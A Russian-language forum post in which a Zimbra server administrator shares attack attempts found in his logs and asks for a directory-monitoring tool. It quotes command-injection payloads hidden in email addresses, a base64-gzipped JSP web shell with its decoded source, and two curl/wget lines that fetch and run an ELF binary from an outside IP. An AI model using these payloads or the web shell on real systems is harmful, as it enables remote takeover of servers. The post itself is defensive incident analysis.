> Я просто отключил его командой zmprov ms $(zmhostname) -zimbraServiceEnabled snmp Ещё раз спасибо! Теперь я могу без нервов смотреть по логам что ко мне пытаются применить. Например, из свежего:
Второе действие
<"x: Service status change: z chmod u+w /opt/zimbra/jetty_base/webapps/zimbra/public;c=$(cat /opt/zimbra/data/tmp/snmpc_*|wc -c);[ $c -eq 493 ]&&cat /opt/zimbra/data/tmp/snmpc_*|base64 -d|gunzip -c>/opt/zimbra/jetty_base/webapps/zimbra/public/zz.jsp;rm -f /opt/zimbra/data/tmp/snmpc_* changed from stopped to running"@example.com>
Предыдущее действие
<"x: Service status change: z ;echo H4sIAPnrf2oC/21R0UoDMRB8v69YA4Wc2qtCH8T2RConCIJSK/iapts2cpeLe3u2xfbfTbgIVsxDIJOZ2clk3LsFp1YIuraMlmc7h7lg3PLAlcrYkV4rapDz19l9/0pA7yYZ/0hM5WriXLyrT5WZOjuN18kLk7Er0JAD4UeLDWcr5GdFqkJGkkJfinSUmCVIz8nBtmUJ+z3ozAsrmWamKSrHO5mm8JWAX3XLmfOmXFophhfDIA84IbdkR8khYdpF7jPVGptm0ppygQRu7mNY3PzBpRjMjR00a3EOoq/9rqOnm2eEC0OouSCqyb8GVSWZWoyM6ATOO3t2w4pYxrtJu1yi109RhekUhx/DMkAP1rXcmUfUhZp+wTL12bri02gfqy2NxQ7YrE2JIGVAQt8+u1o8+kMo76TrNj3qLzC92wG0Yr0GWWw1Oja1Bdz+23fxVtxBMZ0+Ta9BwJmnZVx3QWTIdUj8t38DSjcudkkCAAA= > /opt/zimbra/data/tmp/snmpc_0; changed from stopped to running"@example.com>
Распаковка этой попытки даёт:
<%@ page contentType="text/plain;charset=UTF-8" %>
<%@ page import="java.io.*" %>
<%
String c = request.getParameter("c1");
if (c == null || c.trim().isEmpty()) {
out.println("404");
return;
}
try {
ProcessBuilder pb = new ProcessBuilder("/bin/sh", "-c", c);
pb.redirectErrorStream(true);
Process p = pb.start();
BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream(), "UTF-8"));
String line;
while ((line = r.readLine()) != null) out.println(line);
} catch (Exception ex) {
out.println("EXEC ERROR: " + ex.toString());
}
%>
Это то, что мне пытались втулить в файл /opt/zimbra/jetty_base/webapps/zimbra/public/zz.jsp
Как я понимаю, это попытка прикрутить доступ к шеллу через https? Тогда получается, что стоит прикрутить регулярную проверку состояния папки jetty_base/webapps/zimbra/public/ - изменение списка файлов, изменение прав на файлах, изменение размеров файлов итд.
Думаю, должна существовать готовая приблуда для отслеживания состояния каталогов, чтобы повесить на крон и получать аларм при изменении. А посоветуйте такой инструмент.
Ещё из интересного было
$(curl -s http://64.227.172.9:8044/client_linux -o /tmp/.c || wget -q http://64.227.172.9:8044/client_linux -O /tmp/.c && chmod +x /tmp/.c && nohup /tmp/.c 61742d672e73753a343433 >/dev/null 2>&1 &)
$(curl -s http://64.227.172.9:8033/client_linux -o /tmp/.c || wget -q http://64.227.172.9:8033/client_linux -O /tmp/.c && chmod +x /tmp/.c && nohup /tmp/.c 696d61702e61742d672e73753a38343433 >/dev/null 2>&1 &)
Это ещё до отключения сервиса snmp. И мне повезло, наверное, что у нас работа сети такая неустойчивая - попытка самостоятельно выдернуть этот файл для анализа у меня засыхала где-то на 30%. Там лежал ELF. Но посмотреть что эта штука делает было бы интересно...